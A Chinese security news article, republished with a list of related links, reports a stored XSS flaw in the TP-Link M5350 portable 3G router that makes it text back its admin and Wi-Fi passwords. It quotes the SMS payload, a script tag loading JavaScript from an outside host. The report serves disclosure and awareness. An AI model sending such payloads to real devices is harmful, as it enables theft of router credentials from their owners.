神漏洞!发条短信,路由器竟主动吐露Wi-Fi密码

简介: 本文讲的是神漏洞!发条短信,路由器竟主动吐露Wi-Fi密码,TP-Link的设备漏洞库又增新丁。 这次的主角是TP-Link M5350,一款便携式3G路由器。
本文讲的是 神漏洞!发条短信,路由器竟主动吐露Wi-Fi密码TP-Link的设备漏洞库又增新丁。

这次的主角是TP-Link M5350,一款便携式3G路由器。

Bleeping Computer报道,德国安全研究员Jan Hörsch发现,该款路由器存在一枚神奇漏洞,向路由器发送短信,它便会将管理员密码、Wi-Fi密码以短信形式回复。

这是条什么短信呢?

<script src=//n.ms/a.js></script>
(不用试,研究员早把脚本下线了)

神漏洞!发条短信,路由器竟主动吐露Wi-Fi密码

漏洞效果图

懂行的读者应该已经知道是怎么回事了。没错,这就是XSS(跨站脚本攻击)漏洞。

作为3G路由器,TP-Link M5350支持短信收发功能,但在短信功能位置未做好过滤,以至于产生漏洞。

类似漏洞在互联网产品上比较常见,但能造成此等效果也很罕见,目测是TP-Link内部安全流程没能留意到。

听着厉害,不过想利用漏洞得先搞清楚使用者的3G上网卡号码,难度也不小。

比较奇葩的是,TP-Link目前应该还没修复漏洞。SecurityAffairs专门找了M5350的官方产品页(澳洲版),发现这款路由最新的固件发布日期是2015年1月,显然不是修复版。嘶吼也检索了一番,了解到M5350主要在海外卖,京东淘宝都没有,国内想研究的童鞋显然没啥机会了。




原文发布时间为:2017年4月12日
本文作者:longye
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。
目录
相关文章
|
6月前
|
负载均衡 监控 安全
Wi-Fi漫游深入解析:确保设备连接的有效策略
Wi-Fi漫游深入解析:确保设备连接的有效策略
631 9
|
数据安全/隐私保护 Android开发 iOS开发
一日一技:macOS如何找回已经连接的Wi-Fi密码?
一日一技:macOS如何找回已经连接的Wi-Fi密码?
452 0
一日一技:macOS如何找回已经连接的Wi-Fi密码?
|
数据安全/隐私保护
Win10系统问题集锦:如何查看Win10系统下所连接的无线网络的wifi密码/win系统内部录制声音
Win10系统问题集锦:如何查看Win10系统下所连接的无线网络的wifi密码/win系统内部录制声音
Win10系统问题集锦:如何查看Win10系统下所连接的无线网络的wifi密码/win系统内部录制声音
|
安全 物联网 网络安全
只需7个简单的步骤即可确保您的家庭Wi-Fi安全
家庭Wi-Fi网络中的一个小漏洞可以让犯罪分子访问几乎所有连接该Wi-Fi的设备。这可能会给银行账户、信用卡详细信息、儿童安全以及其他许多问题带来麻烦。
604 0
只需7个简单的步骤即可确保您的家庭Wi-Fi安全
|
安全 数据安全/隐私保护
迅驰WI-FI漏洞引发个人安全隐患
WIFI和无线上网,对于许多人来说已不是陌生词汇.然而迅驰平台的漏洞却让偷窥热了起来。网上破解无线网络的软件比比皆是,当然破解的方法是林林种种。开放的网络——例如办公室,家里,带PORTAL认证的网络——例如机场、运营商,这2中情况下直接用Omnipeek无线抓邮箱的用户名、密码和截获MSN聊天信息都非常大方便,只要你使用的是迅驰无线网卡,网上的破解方法随便搜索,蹭邻居的网上也是很容易的。
1711 0
|
Web App开发 缓存 安全
安全专家称黑客瞄上Wi-Fi免费上网大餐
据国外媒体报道,美国Kismet无线网络监测和入侵监测系统开发者迈克·科尔肖(Mike Kershaw)在美国黑帽安全大会(Black Hat)上表示,咖啡馆和机场等公共wi-fi网络可能会给电脑用户带来更大的安全威胁,因为黑客可以通过无线网络入侵其他用户的浏览器缓存,随后伪装网页或甚至窃取数据 科尔肖表示,黑客很容易通过802.11无线网络劫持一个共同JavaScript文件,从而控制其他用户的网络浏览器缓存。
807 0
|
网络安全 数据安全/隐私保护 网络虚拟化